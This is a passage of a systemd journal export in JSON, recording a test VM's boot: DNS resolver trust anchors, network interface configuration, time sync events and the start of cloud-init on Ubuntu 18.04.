"../src/network/networkd-manager.c", "CODE_LINE" : "1780", "CODE_FUNC" : "manager_set_hostname", "MESSAGE" : "Not connected to system bus, not setting hostname.", "_SOURCE_REALTIME_TIMESTAMP" : "1615280814401352" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=244;b=e2b08827b5804427b422c10c84f1567e;m=2642c5f;t=5bd16df27abc6;x=25d6a409bd6c4b00", "__REALTIME_TIMESTAMP" : "1615280814402502", "__MONOTONIC_TIMESTAMP" : "40119391", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_TRANSPORT" : "journal", "_HOSTNAME" : "test-1", "SYSLOG_FACILITY" : "9", "CODE_FILE" : "../src/timesync/timesyncd-manager.c", "CODE_LINE" : "1070", "CODE_FUNC" : "manager_network_event_handler", "SYSLOG_IDENTIFIER" : "systemd-timesyncd", "MESSAGE" : "Network configuration changed, trying to establish connection.", "_PID" : "501", "_UID" : "62583", "_GID" : "62583", "_COMM" : "systemd-timesyn", "_EXE" : 
"/lib/systemd/systemd-timesyncd", "_CMDLINE" : "/lib/systemd/systemd-timesyncd", "_CAP_EFFECTIVE" : "2000000", "_SYSTEMD_CGROUP" : "/system.slice/systemd-timesyncd.service", "_SYSTEMD_UNIT" : "systemd-timesyncd.service", "_SYSTEMD_INVOCATION_ID" : "02dc978d5d9147908ffca7c0020b3270", "_SOURCE_REALTIME_TIMESTAMP" : "1615280814402353" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=245;b=e2b08827b5804427b422c10c84f1567e;m=264e0a5;t=5bd16df28600c;x=2b63421ba744fd47", "__REALTIME_TIMESTAMP" : "1615280814448652", "__MONOTONIC_TIMESTAMP" : "40165541", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_TRANSPORT" : "journal", "_HOSTNAME" : "test-1", "CODE_FILE" : "../src/resolve/resolved-dns-trust-anchor.c", "CODE_LINE" : "491", "CODE_FUNC" : "dns_trust_anchor_dump", "SYSLOG_IDENTIFIER" : "systemd-resolved", "MESSAGE" : "Positive Trust Anchors:", "_PID" : "617", "_UID" : "101", "_GID" : "103", "_COMM" : "systemd-resolve", "_EXE" : "/lib/systemd/systemd-resolved", "_CMDLINE" : "/lib/systemd/systemd-resolved", "_CAP_EFFECTIVE" : "2500", "_SYSTEMD_CGROUP" : "/system.slice/systemd-resolved.service", "_SYSTEMD_UNIT" : "systemd-resolved.service", "_SYSTEMD_INVOCATION_ID" : "5693a666065f4cca8576cd5ba35dba68", "_SOURCE_REALTIME_TIMESTAMP" : "1615280814448547" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=246;b=e2b08827b5804427b422c10c84f1567e;m=264e25e;t=5bd16df2861c6;x=53e94fe147e04df4", "__REALTIME_TIMESTAMP" : "1615280814449094", "__MONOTONIC_TIMESTAMP" : "40165982", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_TRANSPORT" : "journal", "_HOSTNAME" : "test-1", "CODE_FILE" : "../src/resolve/resolved-dns-trust-anchor.c", "CODE_FUNC" 
: "dns_trust_anchor_dump", "SYSLOG_IDENTIFIER" : "systemd-resolved", "_PID" : "617", "_UID" : "101", "_GID" : "103", "_COMM" : "systemd-resolve", "_EXE" : "/lib/systemd/systemd-resolved", "_CMDLINE" : "/lib/systemd/systemd-resolved", "_CAP_EFFECTIVE" : "2500", "_SYSTEMD_CGROUP" : "/system.slice/systemd-resolved.service", "_SYSTEMD_UNIT" : "systemd-resolved.service", "_SYSTEMD_INVOCATION_ID" : "5693a666065f4cca8576cd5ba35dba68", "CODE_LINE" : "496", "MESSAGE" : ". IN DS 19036 8 2 49aac11d7b6f6446702e54a1607371607a1a41855200fd2ce1cdde32f24e8fb5", "_SOURCE_REALTIME_TIMESTAMP" : "1615280814449087" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=247;b=e2b08827b5804427b422c10c84f1567e;m=264e2ca;t=5bd16df286231;x=b3656ad15fdd74e0", "__REALTIME_TIMESTAMP" : "1615280814449201", "__MONOTONIC_TIMESTAMP" : "40166090", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_TRANSPORT" : "journal", "_HOSTNAME" : "test-1", "CODE_FILE" : "../src/resolve/resolved-dns-trust-anchor.c", "CODE_FUNC" : "dns_trust_anchor_dump", "SYSLOG_IDENTIFIER" : "systemd-resolved", "_PID" : "617", "_UID" : "101", "_GID" : "103", "_COMM" : "systemd-resolve", "_EXE" : "/lib/systemd/systemd-resolved", "_CMDLINE" : "/lib/systemd/systemd-resolved", "_CAP_EFFECTIVE" : "2500", "_SYSTEMD_CGROUP" : "/system.slice/systemd-resolved.service", "_SYSTEMD_UNIT" : "systemd-resolved.service", "_SYSTEMD_INVOCATION_ID" : "5693a666065f4cca8576cd5ba35dba68", "CODE_LINE" : "496", "MESSAGE" : ". 
IN DS 20326 8 2 e06d44b80b8f1d39a95c0b0d7c65d08458e880409bbc683457104237c7f8ec8d", "_SOURCE_REALTIME_TIMESTAMP" : "1615280814449197" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=248;b=e2b08827b5804427b422c10c84f1567e;m=264e354;t=5bd16df2862bc;x=dd13fe1df3b59488", "__REALTIME_TIMESTAMP" : "1615280814449340", "__MONOTONIC_TIMESTAMP" : "40166228", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_TRANSPORT" : "journal", "_HOSTNAME" : "test-1", "CODE_FILE" : "../src/resolve/resolved-dns-trust-anchor.c", "CODE_FUNC" : "dns_trust_anchor_dump", "SYSLOG_IDENTIFIER" : "systemd-resolved", "_PID" : "617", "_UID" : "101", "_GID" : "103", "_COMM" : "systemd-resolve", "_EXE" : "/lib/systemd/systemd-resolved", "_CMDLINE" : "/lib/systemd/systemd-resolved", "_CAP_EFFECTIVE" : "2500", "_SYSTEMD_CGROUP" : "/system.slice/systemd-resolved.service", "_SYSTEMD_UNIT" : "systemd-resolved.service", "_SYSTEMD_INVOCATION_ID" : "5693a666065f4cca8576cd5ba35dba68", "CODE_LINE" : "515", "MESSAGE" : "Negative trust anchors: 10.in-addr.arpa 16.172.in-addr.arpa 17.172.in-addr.arpa 18.172.in-addr.arpa 19.172.in-addr.arpa 20.172.in-addr.arpa 21.172.in-addr.arpa 22.172.in-addr.arpa 23.172.in-addr.arpa 24.172.in-addr.arpa 25.172.in-addr.arpa 26.172.in-addr.arpa 27.172.in-addr.arpa 28.172.in-addr.arpa 29.172.in-addr.arpa 30.172.in-addr.arpa 31.172.in-addr.arpa 168.192.in-addr.arpa d.f.ip6.arpa corp home internal intranet lan local private test", "_SOURCE_REALTIME_TIMESTAMP" : "1615280814449320" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=249;b=e2b08827b5804427b422c10c84f1567e;m=264e894;t=5bd16df2867fb;x=4753c52001af8008", "__REALTIME_TIMESTAMP" : "1615280814450683", "__MONOTONIC_TIMESTAMP" : "40167572", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : 
"6", "SYSLOG_FACILITY" : "3", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_TRANSPORT" : "journal", "_HOSTNAME" : "test-1", "SYSLOG_IDENTIFIER" : "systemd-resolved", "_PID" : "617", "_UID" : "101", "_GID" : "103", "_COMM" : "systemd-resolve", "_EXE" : "/lib/systemd/systemd-resolved", "_CMDLINE" : "/lib/systemd/systemd-resolved", "_CAP_EFFECTIVE" : "2500", "_SYSTEMD_CGROUP" : "/system.slice/systemd-resolved.service", "_SYSTEMD_UNIT" : "systemd-resolved.service", "_SYSTEMD_INVOCATION_ID" : "5693a666065f4cca8576cd5ba35dba68", "CODE_FILE" : "../src/resolve/resolved-manager.c", "CODE_LINE" : "517", "CODE_FUNC" : "manager_watch_hostname", "MESSAGE" : "Using system hostname 'test-1'.", "_SOURCE_REALTIME_TIMESTAMP" : "1615280814450676" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=24a;b=e2b08827b5804427b422c10c84f1567e;m=2650144;t=5bd16df2880ab;x=e7f248e70e6d207c", "__REALTIME_TIMESTAMP" : "1615280814457003", "__MONOTONIC_TIMESTAMP" : "40173892", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "_HOSTNAME" : "test-1", "UNIT" : "systemd-resolved.service", "INVOCATION_ID" : "5693a666065f4cca8576cd5ba35dba68", "MESSAGE" : "Started Network Name Resolution.", "_SOURCE_REALTIME_TIMESTAMP" : "1615280814452271" } { "__CURSOR" : 
"s=d9fa7adefbe34ae1aa61d7656b4137d4;i=24b;b=e2b08827b5804427b422c10c84f1567e;m=26501b2;t=5bd16df28811a;x=dd00ea5542cc278f", "__REALTIME_TIMESTAMP" : "1615280814457114", "__MONOTONIC_TIMESTAMP" : "40174002", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "_HOSTNAME" : "test-1", "MESSAGE" : "Reached target Host and Network Name Lookups.", "UNIT" : "nss-lookup.target", "INVOCATION_ID" : "6c96e169e38646ec879dc9c26874b07c", "_SOURCE_REALTIME_TIMESTAMP" : "1615280814454559" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=24c;b=e2b08827b5804427b422c10c84f1567e;m=26510fd;t=5bd16df289064;x=9308da645fc2b823", "__REALTIME_TIMESTAMP" : "1615280814461028", "__MONOTONIC_TIMESTAMP" : "40177917", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : 
"39f53479d3a045ac8e11786248231fbf", "_HOSTNAME" : "test-1", "MESSAGE" : "Reached target Network.", "UNIT" : "network.target", "INVOCATION_ID" : "f0292f15c43a4eef96deaed11fec60ec", "_SOURCE_REALTIME_TIMESTAMP" : "1615280814459237" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=24d;b=e2b08827b5804427b422c10c84f1567e;m=2766411;t=5bd16df39e377;x=db1c5e6390bcf691", "__REALTIME_TIMESTAMP" : "1615280815596407", "__MONOTONIC_TIMESTAMP" : "41313297", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_TRANSPORT" : "journal", "_HOSTNAME" : "test-1", "SYSLOG_IDENTIFIER" : "systemd-networkd", "_PID" : "600", "_UID" : "100", "_GID" : "102", "_COMM" : "systemd-network", "_EXE" : "/lib/systemd/systemd-networkd", "_CMDLINE" : "/lib/systemd/systemd-networkd", "_CAP_EFFECTIVE" : "3c00", "_SYSTEMD_CGROUP" : "/system.slice/systemd-networkd.service", "_SYSTEMD_UNIT" : "systemd-networkd.service", "_SYSTEMD_INVOCATION_ID" : "14f7386a2cc943d49c3ae6bf27d211fe", "CODE_FILE" : "../src/network/networkd-link.c", "INTERFACE" : "ens3", "CODE_LINE" : "3163", "CODE_FUNC" : "link_ipv6ll_gained", "MESSAGE" : "ens3: Gained IPv6LL", "_SOURCE_REALTIME_TIMESTAMP" : "1615280815596024" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=24e;b=e2b08827b5804427b422c10c84f1567e;m=27666f4;t=5bd16df39e65c;x=23d4c70eda3aa2af", "__REALTIME_TIMESTAMP" : "1615280815597148", "__MONOTONIC_TIMESTAMP" : "41314036", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_TRANSPORT" : "journal", "_HOSTNAME" : "test-1", "SYSLOG_IDENTIFIER" : "systemd-networkd", "_PID" : "600", "_UID" : "100", "_GID" : "102", "_COMM" : "systemd-network", "_EXE" : "/lib/systemd/systemd-networkd", "_CMDLINE" 
: "/lib/systemd/systemd-networkd", "_CAP_EFFECTIVE" : "3c00", "_SYSTEMD_CGROUP" : "/system.slice/systemd-networkd.service", "_SYSTEMD_UNIT" : "systemd-networkd.service", "_SYSTEMD_INVOCATION_ID" : "14f7386a2cc943d49c3ae6bf27d211fe", "CODE_FILE" : "../src/network/networkd-link.c", "INTERFACE" : "ens3", "CODE_LINE" : "741", "CODE_FUNC" : "link_enter_configured", "MESSAGE" : "ens3: Configured", "_SOURCE_REALTIME_TIMESTAMP" : "1615280815596134" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=24f;b=e2b08827b5804427b422c10c84f1567e;m=2768482;t=5bd16df3a03e9;x=44777783d090e933", "__REALTIME_TIMESTAMP" : "1615280815604713", "__MONOTONIC_TIMESTAMP" : "41321602", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "PRIORITY" : "5", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "test-1", "_SOURCE_MONOTONIC_TIMESTAMP" : "41321437", "MESSAGE" : "random: crng init done" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=250;b=e2b08827b5804427b422c10c84f1567e;m=27684fe;t=5bd16df3a0466;x=cb3c66b18efc86ff", "__REALTIME_TIMESTAMP" : "1615280815604838", "__MONOTONIC_TIMESTAMP" : "41321726", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "PRIORITY" : "5", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "test-1", "_SOURCE_MONOTONIC_TIMESTAMP" : "41321439", "MESSAGE" : "random: 7 urandom warning(s) missed due to ratelimiting" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=251;b=e2b08827b5804427b422c10c84f1567e;m=2768525;t=5bd16df3a048c;x=e3c199751aa14f5f", "__REALTIME_TIMESTAMP" : "1615280815604876", "__MONOTONIC_TIMESTAMP" : "41321765", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_TRANSPORT" : "journal", "_HOSTNAME" : 
"test-1", "SYSLOG_FACILITY" : "9", "CODE_FILE" : "../src/timesync/timesyncd-manager.c", "CODE_LINE" : "1070", "CODE_FUNC" : "manager_network_event_handler", "SYSLOG_IDENTIFIER" : "systemd-timesyncd", "MESSAGE" : "Network configuration changed, trying to establish connection.", "_PID" : "501", "_UID" : "62583", "_GID" : "62583", "_COMM" : "systemd-timesyn", "_EXE" : "/lib/systemd/systemd-timesyncd", "_CMDLINE" : "/lib/systemd/systemd-timesyncd", "_CAP_EFFECTIVE" : "2000000", "_SYSTEMD_CGROUP" : "/system.slice/systemd-timesyncd.service", "_SYSTEMD_UNIT" : "systemd-timesyncd.service", "_SYSTEMD_INVOCATION_ID" : "02dc978d5d9147908ffca7c0020b3270", "_SOURCE_REALTIME_TIMESTAMP" : "1615280815598271" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=252;b=e2b08827b5804427b422c10c84f1567e;m=27686ad;t=5bd16df3a0615;x=984b8385613f98c2", "__REALTIME_TIMESTAMP" : "1615280815605269", "__MONOTONIC_TIMESTAMP" : "41322157", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_TRANSPORT" : "journal", "_CAP_EFFECTIVE" : "3fffffffff", "_HOSTNAME" : "test-1", "_COMM" : "systemd-network", "CODE_FILE" : "../src/network/wait-online/manager.c", "CODE_LINE" : "89", "CODE_FUNC" : "manager_all_configured", "SYSLOG_IDENTIFIER" : "systemd-networkd-wait-online", "MESSAGE" : "managing: ens3", "_PID" : "616", "_SYSTEMD_CGROUP" : "/system.slice/systemd-networkd-wait-online.service", "_SYSTEMD_UNIT" : "systemd-networkd-wait-online.service", "_SYSTEMD_INVOCATION_ID" : "2f779d5a71cf4429aa193a78ff1c5862", "_SOURCE_REALTIME_TIMESTAMP" : "1615280815598879" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=253;b=e2b08827b5804427b422c10c84f1567e;m=276899a;t=5bd16df3a0902;x=ce2869e8bb367c39", "__REALTIME_TIMESTAMP" : "1615280815606018", "__MONOTONIC_TIMESTAMP" : "41322906", "_BOOT_ID" : 
"e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_TRANSPORT" : "journal", "_CAP_EFFECTIVE" : "3fffffffff", "_HOSTNAME" : "test-1", "_COMM" : "systemd-network", "CODE_FILE" : "../src/network/wait-online/manager.c", "CODE_FUNC" : "manager_all_configured", "SYSLOG_IDENTIFIER" : "systemd-networkd-wait-online", "_PID" : "616", "_SYSTEMD_CGROUP" : "/system.slice/systemd-networkd-wait-online.service", "_SYSTEMD_UNIT" : "systemd-networkd-wait-online.service", "_SYSTEMD_INVOCATION_ID" : "2f779d5a71cf4429aa193a78ff1c5862", "CODE_LINE" : "72", "MESSAGE" : "ignoring: lo", "_SOURCE_REALTIME_TIMESTAMP" : "1615280815598960" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=254;b=e2b08827b5804427b422c10c84f1567e;m=27689fb;t=5bd16df3a0963;x=cad5aeff3f93fbd8", "__REALTIME_TIMESTAMP" : "1615280815606115", "__MONOTONIC_TIMESTAMP" : "41323003", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "_HOSTNAME" : "test-1", "UNIT" : "systemd-networkd-wait-online.service", "INVOCATION_ID" : "2f779d5a71cf4429aa193a78ff1c5862", "MESSAGE" : "Started Wait for Network to be Configured.", "_SOURCE_REALTIME_TIMESTAMP" : "1615280815601818" } { "__CURSOR" : 
"s=d9fa7adefbe34ae1aa61d7656b4137d4;i=255;b=e2b08827b5804427b422c10c84f1567e;m=276a90f;t=5bd16df3a2877;x=3f8d6df4f98e116a", "__REALTIME_TIMESTAMP" : "1615280815614071", "__MONOTONIC_TIMESTAMP" : "41330959", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "CODE_FILE" : "../src/core/unit.c", "CODE_LINE" : "1718", "CODE_FUNC" : "unit_status_log_starting_stopping_reloading", "MESSAGE_ID" : "7d4958e842da4a758f6c1cdc7b36dcc5", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "_HOSTNAME" : "test-1", "MESSAGE" : "Starting Initial cloud-init job (metadata service crawler)...", "UNIT" : "cloud-init.service", "INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "_SOURCE_REALTIME_TIMESTAMP" : "1615280815610953" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=256;b=e2b08827b5804427b422c10c84f1567e;m=280b8ce;t=5bd16df443834;x=2f7facbcff3c248a", "__REALTIME_TIMESTAMP" : "1615280816273460", "__MONOTONIC_TIMESTAMP" : "41990350", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "MESSAGE" : "Cloud-init v. 19.1-1-gbaa47854-0ubuntu1~18.04.1 running 'init' at Tue, 09 Mar 2021 09:06:56 +0000. 
Up 41.82 seconds.", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=257;b=e2b08827b5804427b422c10c84f1567e;m=280b8ce;t=5bd16df443834;x=8cc996d422496cc0", "__REALTIME_TIMESTAMP" : "1615280816273460", "__MONOTONIC_TIMESTAMP" : "41990350", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "ci-info: +++++++++++++++++++++++++++++++++++++++Net device info+++++++++++++++++++++++++++++++++++++++" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=258;b=e2b08827b5804427b422c10c84f1567e;m=280b8ce;t=5bd16df443834;x=3af3631cbc0f5fe1", "__REALTIME_TIMESTAMP" : "1615280816273460", "__MONOTONIC_TIMESTAMP" : "41990350", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : 
"635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "ci-info: +--------+------+------------------------------+---------------+--------+-------------------+" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=259;b=e2b08827b5804427b422c10c84f1567e;m=280b8ce;t=5bd16df443834;x=29b466862941ac8d", "__REALTIME_TIMESTAMP" : "1615280816273460", "__MONOTONIC_TIMESTAMP" : "41990350", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "ci-info: | Device | Up | Address | Mask | Scope | Hw-Address |" } { "__CURSOR" : 